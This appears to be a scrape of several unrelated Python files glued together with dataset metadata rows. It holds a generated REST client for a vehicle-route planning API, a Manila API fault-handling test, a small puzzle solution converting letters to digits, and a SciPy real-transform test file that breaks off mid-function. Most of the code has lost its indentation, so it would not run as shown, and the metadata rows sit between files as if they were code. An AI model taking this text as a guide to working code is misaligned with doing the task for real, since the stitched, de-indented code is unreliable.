path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def update_planning(self, id, **kwargs):
"""
Update planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str name:
:param str ref:
:param str date:
:param int zoning_id:
:param bool out_of_date:
:param list[int] route_ids:
:param list[int] tag_ids:
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_planning`")
all_params = ['id', 'name', 'ref', 'date', 'zoning_id', 'out_of_date', 'route_ids', 'tag_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'name' in params:
form_params['name'] = params['name']
if 'ref' in params:
form_params['ref'] = params['ref']
if 'date' in params:
form_params['date'] = params['date']
if 'zoning_id' in params:
form_params['zoning_id'] = params['zoning_id']
if 'out_of_date' in params:
form_params['out_of_date'] = params['out_of_date']
if 'route_ids' in params:
form_params['route_ids'] = params['route_ids']
if 'tag_ids' in params:
form_params['tag_ids'] = params['tag_ids']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def delete_planning(self, id, **kwargs):
"""
Delete planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `delete_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method delete_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'DELETE'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def automatic_insert_stop(self, id, **kwargs):
"""
Suggest a place for an unaffected stop.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `automatic_insert_stop`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method automatic_insert_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/automatic_insert.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def clone_planning(self, id, **kwargs):
"""
Clone the planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `clone_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method clone_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/duplicate.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def optimize_routes(self, id, **kwargs):
"""
Starts asynchronous routes optimization.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `optimize_routes`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method optimize_routes" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/optimize_each_routes.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def use_order_array(self, id, order_array_id, shift, **kwargs):
"""
Use order_array in the planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str order_array_id: (required)
:param int shift: (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `use_order_array`")
# verify the required parameter 'order_array_id' is set
if order_array_id is None:
raise ValueError("Missing the required parameter `order_array_id` when calling `use_order_array`")
# verify the required parameter 'shift' is set
if shift is None:
raise ValueError("Missing the required parameter `shift` when calling `use_order_array`")
all_params = ['id', 'order_array_id', 'shift']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method use_order_array" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/orders/{order_array_id}/{shift}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'order_array_id' in params:
path_params['order_array_id'] = params['order_array_id']
if 'shift' in params:
path_params['shift'] = params['shift']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def refresh_planning(self, id, **kwargs):
"""
Force recompute the planning after parameter update.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `refresh_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method refresh_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/refresh.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def switch_vehicles(self, id, **kwargs):
"""
Switch two vehicles.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `switch_vehicles`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method switch_vehicles" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/switch.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def update_stop(self, planning_id, route_id, id, **kwargs):
"""
Update stop.
:param int planning_id: (required)
:param int route_id: (required)
:param int id: (required)
:param bool active:
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `update_stop`")
# verify the required parameter 'route_id' is set
if route_id is None:
raise ValueError("Missing the required parameter `route_id` when calling `update_stop`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_stop`")
all_params = ['planning_id', 'route_id', 'id', 'active']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{route_id}/stops/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'route_id' in params:
path_params['route_id'] = params['route_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'active' in params:
            form_params['active'] = params['active']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def get_routes(self, planning_id, **kwargs):
"""
Fetch planning's routes.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: list[V01Route]
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `get_routes`")
all_params = ['planning_id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_routes" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='list[V01Route]', auth_settings=auth_settings)
return response
def get_route(self, planning_id, id, **kwargs):
"""
Fetch route.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `get_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `get_route`")
all_params = ['planning_id', 'id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def update_route(self, planning_id, id, **kwargs):
"""
Update route.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:param bool hidden:
:param bool locked:
:param str color:
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `update_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_route`")
all_params = ['planning_id', 'id', 'hidden', 'locked', 'color']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'hidden' in params:
form_params['hidden'] = params['hidden']
if 'locked' in params:
form_params['locked'] = params['locked']
if 'color' in params:
form_params['color'] = params['color']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def activation_stops(self, planning_id, id, active, **kwargs):
"""
Change stops activation.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:param str active: (required)
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `activation_stops`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `activation_stops`")
# verify the required parameter 'active' is set
if active is None:
raise ValueError("Missing the required parameter `active` when calling `activation_stops`")
all_params = ['planning_id', 'id', 'active']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method activation_stops" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/active/{active}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
if 'active' in params:
path_params['active'] = params['active']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def move_destinations(self, planning_id, id, destination_ids, **kwargs):
"""
Move destination to routes. Append in order at end.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str id: (required)
:param list[Integer] destination_ids: (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `move_destinations`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `move_destinations`")
# verify the required parameter 'destination_ids' is set
if destination_ids is None:
raise ValueError("Missing the required parameter `destination_ids` when calling `move_destinations`")
all_params = ['planning_id', 'id', 'destination_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method move_destinations" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/destinations/moves.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
if 'destination_ids' in params:
            form_params['destination_ids'] = params['destination_ids']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def optimize_route(self, planning_id, id, **kwargs):
"""
Starts asynchronous route optimization.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `optimize_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `optimize_route`")
all_params = ['planning_id', 'id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method optimize_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/optimize.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
if 'planning_id' in params:
form_params['planning_id'] = params['planning_id']
if 'id' in params:
form_params['id'] = params['id']
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def move_stop(self, planning_id, id, stop_id, index, **kwargs):
"""
Move stop position in routes.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str id: (required)
:param int stop_id: Stop id to move (required)
:param int index: New position in the route (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `move_stop`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `move_stop`")
# verify the required parameter 'stop_id' is set
if stop_id is None:
raise ValueError("Missing the required parameter `stop_id` when calling `move_stop`")
# verify the required parameter 'index' is set
if index is None:
raise ValueError("Missing the required parameter `index` when calling `move_stop`")
all_params = ['planning_id', 'id', 'stop_id', 'index']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method move_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/stops/{stop_id}/move/{index}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
if 'stop_id' in params:
path_params['stop_id'] = params['stop_id']
if 'index' in params:
path_params['index'] = params['index']
query_params = {}
header_params = {}
form_params = {}
if 'planning_id' in params:
form_params['planning_id'] = params['planning_id']
if 'id' in params:
form_params['id'] = params['id']
if 'stop_id' in params:
form_params['stop_id'] = params['stop_id']
if 'index' in params:
form_params['index'] = params['index']
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
| gpl-2.0 | -6,249,175,168,843,568,000 | 31.322182 | 132 | 0.558558 | false | 4.233473 | false | false | false |
vponomaryov/manila | manila/tests/api/middleware/test_faults.py | 1 | 4107 | # Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils
import six
import webob
import webob.dec
import webob.exc
from manila.api.openstack import wsgi
from manila import test
class TestFaults(test.TestCase):
"""Tests covering `manila.api.openstack.faults:Fault` class."""
def _prepare_xml(self, xml_string):
"""Remove characters from string which hinder XML equality testing."""
xml_string = xml_string.replace(" ", "")
xml_string = xml_string.replace("\n", "")
xml_string = xml_string.replace("\t", "")
return xml_string
def test_400_fault_json(self):
"""Test fault serialized to JSON via file-extension and/or header."""
requests = [
webob.Request.blank('/.json'),
webob.Request.blank('/', headers={"Accept": "application/json"}),
]
for request in requests:
fault = wsgi.Fault(webob.exc.HTTPBadRequest(explanation='scram'))
response = request.get_response(fault)
expected = {
"badRequest": {
"message": "scram",
"code": 400,
},
}
actual = jsonutils.loads(response.body)
self.assertEqual("application/json", response.content_type)
self.assertEqual(expected, actual)
def test_413_fault_json(self):
"""Test fault serialized to JSON via file-extension and/or header."""
requests = [
webob.Request.blank('/.json'),
webob.Request.blank('/', headers={"Accept": "application/json"}),
]
for request in requests:
exc = webob.exc.HTTPRequestEntityTooLarge
fault = wsgi.Fault(exc(explanation='sorry',
headers={'Retry-After': 4}))
response = request.get_response(fault)
expected = {
"overLimit": {
"message": "sorry",
"code": 413,
"retryAfter": 4,
},
}
actual = jsonutils.loads(response.body)
self.assertEqual("application/json", response.content_type)
self.assertEqual(expected, actual)
def test_raise(self):
"""Ensure the ability to raise :class:`Fault` in WSGI-ified methods."""
@webob.dec.wsgify
def raiser(req):
raise wsgi.Fault(webob.exc.HTTPNotFound(explanation='whut?'))
req = webob.Request.blank('/.json')
resp = req.get_response(raiser)
self.assertEqual("application/json", resp.content_type)
self.assertEqual(404, resp.status_int)
self.assertIn(six.b('whut?'), resp.body)
def test_raise_403(self):
"""Ensure the ability to raise :class:`Fault` in WSGI-ified methods."""
@webob.dec.wsgify
def raiser(req):
raise wsgi.Fault(webob.exc.HTTPForbidden(explanation='whut?'))
req = webob.Request.blank('/.json')
resp = req.get_response(raiser)
self.assertEqual("application/json", resp.content_type)
self.assertEqual(403, resp.status_int)
self.assertNotIn(six.b('resizeNotAllowed'), resp.body)
self.assertIn(six.b('forbidden'), resp.body)
def test_fault_has_status_int(self):
"""Ensure the status_int is set correctly on faults."""
fault = wsgi.Fault(webob.exc.HTTPBadRequest(explanation='what?'))
self.assertEqual(400, fault.status_int)
| apache-2.0 | -6,209,282,040,056,393,000 | 36 | 79 | 0.60263 | false | 4.22966 | true | false | false |
ProgDan/maratona | URI/uri2690.py | 1 | 1630 | class Main:
def __init__(self):
self.n = int(input())
self.s = ""
def change(self):
self.con = 0
for i in range(0, len(self.s)):
if self.con == 12:
break
elif self.s[i] in ['a', 'k', 'u', 'G', 'Q']:
print(0, end='')
self.con += 1
elif self.s[i] in ['b', 'l', 'v', 'I', 'S']:
print(1, end='')
self.con += 1
elif self.s[i] in ['c', 'm', 'w', 'E', 'O', 'Y']:
print(2, end='')
self.con += 1
elif self.s[i] in ['d', 'n', 'x', 'F', 'P', 'Z']:
print(3, end='')
self.con += 1
elif self.s[i] in ['e', 'o', 'y', 'J', 'T']:
print(4, end='')
self.con += 1
elif self.s[i] in ['f', 'p', 'z', 'D', 'N', 'X']:
print(5, end='')
self.con += 1
elif self.s[i] in ['g', 'q', 'A', 'K', 'U']:
print(6, end='')
self.con += 1
elif self.s[i] in ['h', 'r', 'C', 'M', 'W']:
print(7, end='')
self.con += 1
elif self.s[i] in ['i', 's', 'B', 'L', 'V']:
print(8, end='')
self.con += 1
elif self.s[i] in ['j', 't', 'H', 'R']:
print(9, end='')
self.con += 1
print()
def output(self):
for self.i in range(0, self.n):
self.s = input()
self.change()
if __name__ == '__main__':
obj = Main()
obj.output()
| gpl-3.0 | 6,681,451,894,900,894,000 | 30.960784 | 61 | 0.320245 | false | 3.306288 | false | false | false |
DailyActie/Surrogate-Model | 01-codes/scipy-master/scipy/fftpack/tests/test_real_transforms.py | 1 | 14903 | #!/usr/bin/env python
from __future__ import division, print_function, absolute_import
from os.path import join, dirname
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_equal, TestCase
from scipy.fftpack.realtransforms import dct, idct, dst, idst
# Matlab reference data
MDATA = np.load(join(dirname(__file__), 'test.npz'))
X = [MDATA['x%d' % i] for i in range(8)]
Y = [MDATA['y%d' % i] for i in range(8)]
# FFTW reference data: the data are organized as follows:
# * SIZES is an array containing all available sizes
# * for every type (1, 2, 3, 4) and every size, the array dct_type_size
# contains the output of the DCT applied to the input np.linspace(0, size-1,
# size)
FFTWDATA_DOUBLE = np.load(join(dirname(__file__), 'fftw_double_ref.npz'))
FFTWDATA_SINGLE = np.load(join(dirname(__file__), 'fftw_single_ref.npz'))
FFTWDATA_SIZES = FFTWDATA_DOUBLE['sizes']
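# For example (illustrative, assuming 16 is among the available sizes),
# FFTWDATA_DOUBLE['dct_2_16'] holds the type-II DCT of np.linspace(0, 15, 16).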
def fftw_dct_ref(type, size, dt):
x = np.linspace(0, size - 1, size).astype(dt)
dt = np.result_type(np.float32, dt)
if dt == np.double:
data = FFTWDATA_DOUBLE
elif dt == np.float32:
data = FFTWDATA_SINGLE
else:
raise ValueError()
y = (data['dct_%d_%d' % (type, size)]).astype(dt)
return x, y, dt
def fftw_dst_ref(type, size, dt):
x = np.linspace(0, size - 1, size).astype(dt)
dt = np.result_type(np.float32, dt)
if dt == np.double:
data = FFTWDATA_DOUBLE
elif dt == np.float32:
data = FFTWDATA_SINGLE
else:
raise ValueError()
y = (data['dst_%d_%d' % (type, size)]).astype(dt)
return x, y, dt
class TestComplex(TestCase):
def test_dct_complex64(self):
y = dct(1j * np.arange(5, dtype=np.complex64))
x = 1j * dct(np.arange(5))
assert_array_almost_equal(x, y)
def test_dct_complex(self):
y = dct(np.arange(5) * 1j)
x = 1j * dct(np.arange(5))
assert_array_almost_equal(x, y)
def test_idct_complex(self):
y = idct(np.arange(5) * 1j)
x = 1j * idct(np.arange(5))
assert_array_almost_equal(x, y)
def test_dst_complex64(self):
y = dst(np.arange(5, dtype=np.complex64) * 1j)
x = 1j * dst(np.arange(5))
assert_array_almost_equal(x, y)
def test_dst_complex(self):
y = dst(np.arange(5) * 1j)
x = 1j * dst(np.arange(5))
assert_array_almost_equal(x, y)
def test_idst_complex(self):
y = idst(np.arange(5) * 1j)
x = 1j * idst(np.arange(5))
assert_array_almost_equal(x, y)
class _TestDCTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = 14
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
x, yr, dt = fftw_dct_ref(self.type, i, self.rdt)
y = dct(x, type=self.type)
assert_equal(y.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(y / np.max(y), yr / np.max(y), decimal=self.dec,
err_msg="Size %d failed" % i)
def test_axis(self):
nt = 2
for i in [7, 8, 9, 16, 32, 64]:
x = np.random.randn(nt, i)
y = dct(x, type=self.type)
for j in range(nt):
assert_array_almost_equal(y[j], dct(x[j], type=self.type),
decimal=self.dec)
x = x.T
y = dct(x, axis=0, type=self.type)
for j in range(nt):
assert_array_almost_equal(y[:, j], dct(x[:, j], type=self.type),
decimal=self.dec)
class _TestDCTIIBase(_TestDCTBase):
def test_definition_matlab(self):
